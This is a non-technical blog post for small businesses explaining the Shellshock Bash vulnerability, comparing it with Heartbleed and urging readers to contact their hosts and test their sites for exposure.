The Internet is abuzz with trepidation about a new bug in software systems, and it’s with good reason. Shellshock is the name bequeathed to the bug that affects Bash, a shell program, and it’s threatening enough to make cyber security experts shiver with fear. It is predicted that this ‘Bash Bug’ could have more crippling consequences than the Heartbleed bug that reared its head in April. Shellshock is as serious a menace as security bugs can be. It is likely that we can’t begin to know all of the vulnerabilities that are at stake. Shellshock is still in its earliest stages and we don’t know everything about it yet, but here is a brief rundown of the bug in layman’s terms (follow the links for more comprehensive info).
In simple terms, Shellshock is a vulnerability in Bash. Bash is system software that millions of computers used, meaning that the scope of possible cyber hacks is immense. Bash has been around for 25 years, and this bug has affected every version of Bash installs. Bash controls the command prompt in Linux and Mac OS X. By targeting Bash, attackers using Shellshock have the ability to execute arbitrary commands on these web servers. Web servers are the place many small businesses have their websites hosting, along with other cloud-based Internet services.
The Heartbleed bug was thought to be pretty bad – well, Shellshock wasn’t around a few months ago. A Mashable article explains: “Unlike Heartbleed, which forced users to change their passwords for various Internet services, Shellshock doesn’t appear to have any easy solutions for average users right now. In most cases, it will be up to system administrators and software companies to issues patches.”
Shellshock allows devious hackers to add malicious information into program commands. Thus, the flaw in Bash makes it so that an attacker can implement environmental variables containing arbitrary commands that can be executed on vulnerable systems. This puts Bash systems at risk to be corrupted and data to be revealed. A patch for Linux-based systems was issued, but it was found to be incomplete. New patches are being developed to be put in place to protect against the bug.
To conclude, this means that your business could be at risk. It’s still too early for outright panic, and security experts (a.k.a. the good guys) are working to figure out a way to stop the bug from advancing and halt the hackers (the bad guys). For now, your main concern is how to protect your website or network from data theft, malware infections, and full network shutdowns. If you’re site if hosted by an outside company, make sure that you check with you host to find out how they’re responding to the Bash Bug. You should also double check that your domain is secure and that your antivirus software is up to date. Do not let your guard down and assume that Shellshock won’t get you.
It’s probably not a bad idea to run a test to check your vulnerability. This web-based tool allows you to check and see if Linux-based sites are vulnerable to Shellshock. Enter in the information, and it will tell you if you are at risk. Alternatively, test your vulnerability using this one. In any case, leaving “well enough alone” isn’t a good solution; when you know there’s a risk, it’s best practice to mitigate any future vulnerabilities, and prepare for the next thing hackers will likely launch.
Photo credit: ZDNet